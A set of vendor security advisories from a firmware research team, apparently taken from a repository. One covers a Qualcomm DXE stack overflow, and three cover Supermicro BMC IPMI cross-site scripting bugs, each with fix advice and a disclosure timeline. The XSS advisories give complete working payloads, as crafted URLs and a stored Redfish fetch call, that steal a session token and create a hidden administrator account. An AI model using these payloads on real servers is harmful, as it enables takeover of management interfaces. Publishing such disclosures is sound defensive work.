| 72 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 73 | 74 | | Disclosure Activity | Date (YYYY-mm-dd) | 75 | | ---------------------------------------- | ----------------- | 76 | | Qualcomm PSIRT is notified | 2022-10-21 | 77 | | Qualcomm PSIRT confirmed reported issue | 2022-10-30 | 78 | | Qualcomm PSIRT assigned CVE number | 2022-12-19 | 79 | | Qualcomm PSIRT provide patch release | 2023-01-03 | 80 | | BINARLY public disclosure date | 2023-01-09 | 81 | 82 | ## Acknowledgements 83 | 84 | **BINARLY efiXplorer team** 85 | -------------------------------------------------------------------------------- /Qualcomm/BRLY-DVA-2023-024.md: -------------------------------------------------------------------------------- 1 | # [BRLY-DVA-2023-024] 2 | 3 | _This vulnerability was detected by the Deep Vulnerability Analysis (DVA) component from Binarly Platform_ 4 | 5 | # The stack buffer overflow vulnerability leads to arbitrary code execution during DXE phase. 6 | 7 | ## Summary 8 | 9 | **BINARLY efiXplorer team** has discovered a stack buffer overflow vulnerability that allows an attacker to execute arbitrary code. 10 | 11 | ## Vulnerability Information 12 | 13 | - BINARLY internal vulnerability identifier: BRLY-DVA-2023-024 14 | - Qualcomm PSIRT assigned CVE identifier: [CVE-2022-40516](https://docs.qualcomm.com/product/publicresources/securitybulletin/january-2023-bulletin.html) 15 | - CVSS v3.1 Score 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 16 | 17 | ## Affected Lenovo firmware with confirmed impact by BINARLY team 18 | 19 | | Device | Module name | Module SHA256 | File GUID | 20 | | -------------------------- | ---------------- | ---------------------------------------------------------------- | ------------------------------------ | 21 | | Surface Duo 2 for Business | QcomChargerDxeLA | 1ba0dc20d9c2ce47686a59717889abb35e1aff780cf00a21e70fec4329324ec3 | 4bce7f36-428e-4393-99e3-7e0844404dba | 22 | 23 | ## Potential impact 24 | 25 | An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. 26 | A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 27 | 28 | ## Vulnerability description 29 | 30 | The pseudocode of the vulnerable function is shown below: 31 | 32 | ```c 33 | EFI_STATUS sub_1AC8() 34 | { 35 | UINTN DataSize; 36 | char Data; 37 | 38 | Data = 0; 39 | DataSize = 1; 40 | if ( (gPassed & 1) == 0 ) 41 | { 42 | gPassed = 1; 43 | if ( !gRT->GetVariable(L"PrintChargerAppDbgMsg", &QCOM_TOKEN_SPACE_GUID, 0, &DataSize, &Data) ) 44 | gPrintChargerAppDbgMsg = Data != 0; 45 | if ( !gRT->GetVariable(L"ChargerPDLogLevel", &QCOM_TOKEN_SPACE_GUID, 0, &DataSize, &Data) ) 46 | gChargerPDLogLevel = Data; 47 | if ( !gRT->GetVariable(L"ChargerPDLogTimer", &QCOM_TOKEN_SPACE_GUID, 0, &DataSize, &Data) ) 48 | { 49 | gChargerPDLogTimer = Data; 50 | gChargerPDLogTimerTrue = Data != 0; 51 | } 52 | } 53 | return EFI_SUCCESS; 54 | } 55 | ``` 56 | 57 | As we can see from the pseudocode, `DataSize` is initialized only once (before the first call to `gRT->GetVariable()`). 58 | 59 | Thus, if the data size of the variable in NVRAM is greater than 1, DataSize will be overwritten. Thus, a next call to `gRT-GetVariable()` may cause an overflow on the stack (and subsequent execution of arbitrary code). 60 | 61 | In order to fix this vulnerability, the `DataSize` variable must be initialized before each call to `gRT->GetVariable()`. 62 | 63 | ## Disclosure timeline 64 | 65 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 66 | 67 | | Disclosure Activity | Date (YYYY-mm-dd) | 68 | | --------------------------------------- | ----------------- | 69 | | Qualcomm PSIRT is notified | 2022-10-21 | 70 | | Qualcomm PSIRT confirmed reported issue | 2022-10-30 | 71 | | Qualcomm PSIRT assigned CVE number | 2022-12-19 | 72 | | Qualcomm PSIRT provide patch release | 2023-01-03 | 73 | | BINARLY public disclosure date | 2025-04-04 | 74 | 75 | ## Acknowledgements 76 | 77 | **BINARLY efiXplorer team** 78 | 79 | ## References 80 | 81 | - [BRLY-2022-029](https://github.com/binarly-io/Vulnerability-REsearch/blob/c6de830f9b8a1d36d75c75e986ce87017968f176/Qualcomm/BRLY-2022-029.md) 82 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BINARLY Vulnerability REsearch Advisories 2 | 3 | All issues discovered by BINARLY team are subject to a 90-days disclosure deadline. After the deadline has passed or a patch has been made available (whichever is earlier), the bug report will become visible to the public. As an exception, the timeline can be extended at the vendor’s request. 4 | 5 | This work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/4.0/. 6 | -------------------------------------------------------------------------------- /Supermicro/BRLY-2023-007.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2023-007] 2 | 3 | # Cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `config_ip_ctrl_change` webpage using `index` GET parameter 4 | 5 | ## Summary 6 | 7 | **BINARLY team** has discovered a DOM-based cross-site scripting (XSS) vulnerability in the `config_ip_ctrl_change` webpage that uses `index` GET parameter, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2023-007 12 | * Supermicro PSIRT assigned CVE identifier: [CVE-2023-40284](https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2023) 13 | * BINARLY calculated CVSS v3.1: 9.6 Critical AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 14 | * Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Supermicro firmware with confirmed impact by Binarly team 17 | 18 | | Device | Version | SHA256 | 19 | | -------------------------- | ------------- | ---------------------------------------------------------------- | 20 | | X11SSM-F/X11SAE-F/X11SSE-F | 1.66 | dbc3842a5e3918463690fa165b2b0955989c00702bc7284af5875ef08e7606b1 | 21 | 22 | ## Potential impact 23 | 24 | An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full access to these settings: System Information, Chassis Locator Control, FRU Reading, Sensor Readings, Event Log, Alert, LDAP, Mouse Mode, Network, SMTP, SSL, Users, Event Action, Power Control, KVM, F/W Update, Logout. It also allows exploitation of vulnerabilities that require authentication. 25 | 26 | ## Vulnerability description 27 | 28 | `config_ip_ctrl_change` HTML page contains the `PageInit()` JavaScript function, which is executed when the webpage is loaded. This function gets the value of the `index` request parameter and then assigns it to the content of the HTML object with id = `ruleno` using the `innerHTML` property without any sanitization. 29 | 30 | ```javascript 31 | function PageInit() 32 | { 33 | ... 34 | index_var = GetVars("index"); 35 | ... 36 | ruleno_obj = document.getElementById("ruleno"); 37 | ... 38 | ruleno_obj.innerHTML = index_var; 39 | ... 40 | } 41 | 42 | function GetVars (str) 43 | { 44 | url = location.search; 45 | var parameterList = url.split ("&"); 46 | for (var i = 0; i < parameterList.length; i++) { 47 | parameter = parameterList[i].split ("="); 48 | if (parameter[0] == str) { 49 | return (decodeURIComponent (parameter[1])); 50 | } 51 | } 52 | } 53 | ``` 54 | 55 | As a result, arbitrary JavaScript code can be injected into the webpage, which will be executed on behalf of the authenticated user. 56 | 57 | ## Steps for exploitation 58 | 59 | To create an administrator account with username `BRLY` and password `BRLYBRLY` an attacker can trick an authenticated user with administrative privileges to open this link in a web browser: 60 | 61 | ``` 62 | https://192.168.0.8:443/cgi/url_redirect.cgi?url_name=config_ip_ctrl_change&index=%3Cimg%20src%3d1%20onerror%3d'var csrfRegex%3d/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch%3dcsrfRegex.exec(document.body.innerHTML);var csrf%3dcsrfMatch[1];fetch("https://192.168.0.8:443/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op%3dconfig_user%26username%3dBRLY%26original_username%3d2%26password%3dBRLYBRLY%26new_privilege%3d4%26_%3d"})'%3E 63 | ``` 64 | 65 | Here, the `onerror` event is used to execute JavaScript code when the browser tries to download a non-existent image. The JS code first obtains the user's CSRF token and then uses it to make a `POST` request in order to create a user with administrative privileges and credentials defined by the attacker. 66 | 67 | ## How to fix it 68 | 69 | Ideally, user controlled parameters should not be assigned to HTML elements. If it is not possible in such case, the `index` parameter must be checked against a whitelist of allowed values. 70 | 71 | ## Disclosure timeline 72 | 73 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 74 | 75 | | Disclosure Activity | Date (YYYY-mm-dd) | 76 | | ---------------------------------------- | ----------------- | 77 | | Supermicro PSIRT is notified | 2023-06-20 | 78 | | Supermicro PSIRT confirmed reported issue| 2023-06-29 | 79 | | Supermicro PSIRT assigned CVE number | 2023-08-17 | 80 | | Supermicro PSIRT provide patch release | 2023-10-03 | 81 | | BINARLY public disclosure date | 2023-10-03 | 82 | 83 | ## Acknowledgements 84 | 85 | **BINARLY team** 86 | -------------------------------------------------------------------------------- /Supermicro/BRLY-2023-008.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2023-008] 2 | 3 | # Cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `modify_nm_policy` webpage using `pdomain` GET parameter 4 | 5 | ## Summary 6 | 7 | **BINARLY team** has discovered a DOM-based cross-site scripting (XSS) vulnerability in the `modify_nm_policy` webpage that uses `pdomain` GET parameter, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2023-008 12 | * Supermicro PSIRT assigned CVE identifier: [CVE-2023-40287](https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2023) 13 | * BINARLY calculated CVSS v3.1: 9.6 Critical AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 14 | * Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Supermicro firmware with confirmed impact by Binarly team 17 | 18 | | Device | Version | SHA256 | 19 | | -------------------------- | ------------- | ---------------------------------------------------------------- | 20 | | X11SSM-F/X11SAE-F/X11SSE-F | 1.66 | dbc3842a5e3918463690fa165b2b0955989c00702bc7284af5875ef08e7606b1 | 21 | 22 | ## Potential impact 23 | 24 | An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full access to these settings: System Information, Chassis Locator Control, FRU Reading, Sensor Readings, Event Log, Alert, LDAP, Mouse Mode, Network, SMTP, SSL, Users, Event Action, Power Control, KVM, F/W Update, Logout. It also allows exploitation of vulnerabilities that require authentication. 25 | 26 | ## Vulnerability description 27 | 28 | `modify_nm_policy` HTML page contains the `PageInit()` JavaScript function, which is executed when the webpage is loaded. This function gets the value of the `pdomain` request parameter and then assigns it to the content of the HTML object with id = `PolicyDomain` using the `innerHTML` property without any sanitization. 29 | 30 | ```javascript 31 | function PageInit() 32 | { 33 | ... 34 | PolicyDomainOBJ = document.getElementById("PolicyDomain"); 35 | ... 36 | PolicyDomainOBJ.innerHTML = GetVars("pdomain"); 37 | ... 38 | 39 | function GetVars (str) 40 | { 41 | url = location.search; 42 | var parameterList = url.split ("&"); 43 | for (var i = 0; i < parameterList.length; i++) { 44 | parameter = parameterList[i].split ("="); 45 | if (parameter[0] == str) { 46 | return (decodeURIComponent (parameter[1])); 47 | } 48 | } 49 | } 50 | ``` 51 | 52 | As a result, arbitrary JavaScript code can be injected into the webpage, which will be executed on behalf of the authenticated user. 53 | 54 | ## Steps for exploitation 55 | 56 | To create an administrator account with username `BRLY` and password `BRLYBRLY` an attacker can trick an authenticated user with administrative privileges to open this link in a web browser: 57 | 58 | ``` 59 | https://192.168.0.8:443/cgi/url_redirect.cgi?url_name=modify_nm_policy&pdomain=%3Cimg%20src%3d1%20onerror%3d'var csrfRegex%3d/CSRF_TOKEN", "([^"]*?)"/g;var csrfMatch%3dcsrfRegex.exec(document.body.innerHTML);var csrf%3dcsrfMatch[1];fetch("https://192.168.0.8:443/cgi/op.cgi",{method:"POST",headers:{"Csrf_token":csrf},body:"op%3dconfig_user%26username%3dBRLY%26original_username%3d2%26password%3dBRLYBRLY%26new_privilege%3d4%26_%3d"})'%3E 60 | ``` 61 | 62 | Here, the `onerror` event is used to execute JavaScript code when the browser tries to download a non-existent image. The JS code first obtains the user's CSRF token and then uses it to make a `POST` request in order to create a user with administrative privileges and credentials defined by the attacker. 63 | 64 | ## How to fix it 65 | 66 | Ideally, user controlled parameters should not be assigned to HTML elements. If it is not possible in such case, the `pdomain` parameter must be checked against a whitelist of allowed values. 67 | 68 | ## Disclosure timeline 69 | 70 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 71 | 72 | | Disclosure Activity | Date (YYYY-mm-dd) | 73 | | ---------------------------------------- | ----------------- | 74 | | Supermicro PSIRT is notified | 2023-06-28 | 75 | | Supermicro PSIRT confirmed reported issue| 2023-06-29 | 76 | | Supermicro PSIRT assigned CVE number | 2023-08-17 | 77 | | Supermicro PSIRT provide patch release | 2023-10-03 | 78 | | BINARLY public disclosure date | 2023-10-03 | 79 | 80 | ## Acknowledgements 81 | 82 | **BINARLY team** 83 | -------------------------------------------------------------------------------- /Supermicro/BRLY-2023-023.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2023-023] 2 | 3 | # Stored cross-site scripting vulnerability in Supermicro BMC IPMI firmware in the `man_ikvm_html5_bootstrap` webpage using `lang` local storage item 4 | 5 | ## Summary 6 | 7 | **BINARLY team** has discovered a stored DOM-based cross-site scripting (XSS) vulnerability in the `man_ikvm_html5_bootstrap` webpage that uses `lang` local storage item, included in the web server component of Supermicro BMC IPMI firmware, allowing a possible attacker to gain access to an account with administrator privileges. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2023-023 12 | * Supermicro advisory: https://www.supermicro.com/en/support/security_BMC_IPMI_Apr_2024 13 | * BINARLY calculated CVSS v3.1: 8.6 High AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H 14 | * Supermicro PSIRT calculated CVSS v3.1: 8.3 High AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H 15 | 16 | ## Affected Supermicro firmwares with confirmed impact by Binarly team 17 | 18 | | Device | Version | SHA256 | 19 | | ------------------------------------- | ------------- | ---------------------------------------------------------------- | 20 | | H12SSL-C/H12SSL-CT/H12SSL-i/H12SSL-NT | 01.01.10 | 66d376c40641bfdb9196244973fdf9d297c26f7fa48981a625ce7800448fafd9 | 21 | 22 | ## Potential impact 23 | 24 | An attacker could exploit this vulnerability to create an account with administrative privileges to the web server component of BMC IPMI software. Such account provides full access to all IPMI feautures. It also allows exploitation of vulnerabilities that require authentication. 25 | Successful exploitation of this vulnerability provides an attacker with persistence, allowing malicious code to be executed until the victim takes remedial actions. 26 | 27 | ## Vulnerability description 28 | 29 | `man_ikvm_html5_bootstrap` webserver HTML page passes the value of `lang` local storage item to the `eval()` JavaScript function without any sanitization: 30 | 31 | man_ikvm_html5_bootstrap: 32 | ```javascript 33 | var sel = WebUtil.readSetting("lang","en"); 34 | 35 | translator = jQuery('body').translate ({ 36 | lang: sel, 37 | t: eval("kvmdict_" + sel) 38 | }); 39 | ``` 40 | 41 | As a result, arbitrary JavaScript code can be injected into webpages, which will be executed on behalf of the authenticated user. 42 | 43 | ## Steps for exploitation 44 | 45 | The first step to exploit this vulnerability is to poison the user's `lang` local storage item. This can be achieved using another vulnerability in the web server (with XSS, HTTP header injection, etc.), as well as through exploitation of other system components, for example, with a malware. 46 | 47 | To create an administrator account with username `user` and password `fLbYsEHqhGYp9pgK` an attacker can poison the `lang` local storage item of an authenticated user session with administrative privileges with the following payload: 48 | 49 | ``` 50 | en + fetch("/redfish/v1/AccountService/Accounts",{method:"POST",headers:{"X-Auth-Token":sessionStorage.getItem("_x_auth")},body:JSON.stringify({"UserName":"user","Password":"fLbYsEHqhGYp9pgK","RoleId":"Administrator","Enabled":true,"AccountTypes":["Redfish"]})}) 51 | ``` 52 | 53 | This payload first obtains the user's valid token and then uses it to make a `POST` request in order to create a user with administrative privileges and credentials defined by the attacker. 54 | 55 | **_NOTE:_** The payload will be executed every time the victim visits vulnerable pages while the `lang` local storage item value is poisoned, even after logging in again, making this attack persistent. To terminate the exploitation, additional steps are required to clear the element local storage value. 56 | 57 | ## How to fix it 58 | 59 | Ideally, user controlled inputs should not be passed to dangerous JavaScript functions such as `eval()`. If it is not possible in such case, the `lang` local storage item value must be checked against a whitelist of allowed values. 60 | 61 | ## Disclosure timeline 62 | 63 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 64 | 65 | | Disclosure Activity | Date (YYYY-mm-dd) | 66 | | ---------------------------------------- | ----------------- | 67 | | Supermicro PSIRT is notified | 2023-12-22 | 68 | | Supermicro PSIRT confirmed reported issue| 2024-02-13 | 69 | | Supermicro public disclosure date | 2024-04-02 | 70 | | BINARLY public disclosure date | 2024-09-16 | 71 | 72 | ## Acknowledgements 73 | 74 | **BINARLY team** 75 | -------------------------------------------------------------------------------- /Supermicro/verified-u-boot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/binarly-io/Vulnerability-REsearch/d187a2568cf00c5d328f33aa73bd1e8a72c45293/Supermicro/verified-u-boot.png --------------------------------------------------------------------------------